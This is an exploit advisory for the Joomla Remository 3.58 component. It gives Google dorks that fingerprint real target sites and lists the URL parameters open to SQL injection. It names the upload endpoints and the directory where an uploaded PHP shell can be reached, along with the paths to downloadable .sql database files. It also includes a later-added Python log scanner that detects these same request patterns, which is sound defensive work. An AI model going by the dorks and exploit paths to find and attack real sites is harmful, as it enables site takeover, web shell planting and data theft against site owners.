KingSkrupellos

Joomla Remository Components 3.58 Multiple Vuln

Jan 30th, 2019
####################################################################

# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010284

####################################################################

# Description about Software :
***************************

“Remository” is open source software for Joomla.

####################################################################

# Impact :
***********

* Attackers can exploit this issue via a browser.

* The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files (shell upload) because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

* An attacker might be able to inject into and/or alter existing SQL statements, which would influence the database exchange.

* Joomla Remository Components 3.58 is vulnerable to SQL injection because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read and write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_remository&Itemid=[SQL Injection]

/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]

####################################################################

# Arbitrary File Upload Exploit :
****************************

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles

/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]

/index.php/shared-file-repository/func-addmanyfiles/

Directory File Path :
******************

Look for the uploaded file here.

/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php

/components/com_remository_files/......

Note : If a website is not vulnerable, it says:

You have no permitted upload categories - please refer to the webmaster

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_remository/assignment.sql

/administrator/components/com_remository/blob.sql

/administrator/components/com_remository/containers.sql

/administrator/components/com_remository/file.sql

/administrator/components/com_remository/log.sql

/administrator/components/com_remository/permission.sql

/administrator/components/com_remository/repository.sql

/administrator/components/com_remository/reviews.sql

/administrator/components/com_remository/structure.sql

/administrator/components/com_remository/text.sql
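
Added detection example (not part of the original advisory): the Python below scans web-server access log lines for the request shapes listed in the SQL injection, file upload and database disclosure sections above. The function names, finding labels and log lines are constructed for illustration; it assumes combined log format and that the parameters the advisory marks [ID-NUMBER] are numeric in normal traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request shapes come from the advisory; names and log lines are constructed.
NUMERIC_PARAMS = ("Itemid", "cat", "id", "orderby", "page", "no_html")
UPLOAD_FUNCS = {"addfile", "addmanyfiles"}
SQL_FILE = re.compile(r"/administrator/components/com_remository/[^/]+\.sql$", re.I)
STORED_SCRIPT = re.compile(r"/components/com_remository_files/.+\.(?:php\d?|phtml|phar)$", re.I)
SEF_UPLOAD = re.compile(r"/func-(?:addfile|addmanyfiles)(?:/|$)", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')

SAMPLE_LOG = """\
192.0.2.10 - - [30/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_remository&Itemid=60&func=select&id=3 HTTP/1.1" 200 5120
198.51.100.7 - - [30/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_remository&Itemid=60&func=fileinfo&id=3%27 HTTP/1.1" 500 312
198.51.100.7 - - [30/Jan/2019:10:00:09 +0000] "GET /administrator/components/com_remository/structure.sql HTTP/1.1" 200 20480
198.51.100.7 - - [30/Jan/2019:10:00:12 +0000] "GET /index.php?option=com_remository&Itemid=60&func=addfile HTTP/1.1" 200 4096
198.51.100.7 - - [30/Jan/2019:10:00:20 +0000] "GET /components/com_remository_files/file_image_7/1234sample.php HTTP/1.1" 200 17
"""

def classify(url):
    """Return the set of advisory-derived findings for one request target."""
    path = unquote(urlsplit(url).path)
    query = parse_qs(urlsplit(url).query)  # percent-decodes values, so %27 becomes '
    findings = set()
    if SQL_FILE.search(path):
        findings.add("sql-file-request")      # database disclosure section
    if STORED_SCRIPT.search(path):
        findings.add("script-in-file-store")  # executable file in the upload directory
    if SEF_UPLOAD.search(path):
        findings.add("upload-form")           # SEF route form of the upload page
    if query.get("option", [""])[0] == "com_remository":
        if query.get("func", [""])[0] in UPLOAD_FUNCS:
            findings.add("upload-form")
        for name in NUMERIC_PARAMS:
            if any(not re.fullmatch(r"[0-9]+", v) for v in query.get(name, [])):
                findings.add("non-numeric:" + name)  # e.g. a trailing quote
    return findings

def scan(log_text):
    """Return (line_number, status, sorted findings) for each flagged log line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.search(line)
        if match and (found := classify(match.group(1))):
            hits.append((number, int(match.group(2)), sorted(found)))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on a sql-file-request or script-in-file-store hit means the file was actually served and needs follow-up. The .sql files should not be reachable over HTTP, and the file store should not execute scripts.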

####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# SQL Database Error :
*********************

Strict Standards: Non-static method JLoader::import() should not be called statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29

Deprecated: Assigning the return value of new by reference is deprecated in /home/epangsof/public_html/includes/joomla.php on line 836

Warning: Cannot modify header information - headers already sent by (output started at /home/epangsof/public_html/includes/joomla.php:836) in /home/epangsof/public_html/includes/joomla.php on line 697

Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime() in /home4/hbman23/public_html/main/includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html/main/index.php(22): require_once() #1 {main} thrown in /home4/hbman23/public_html/main/includes/framework.php on line 21

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################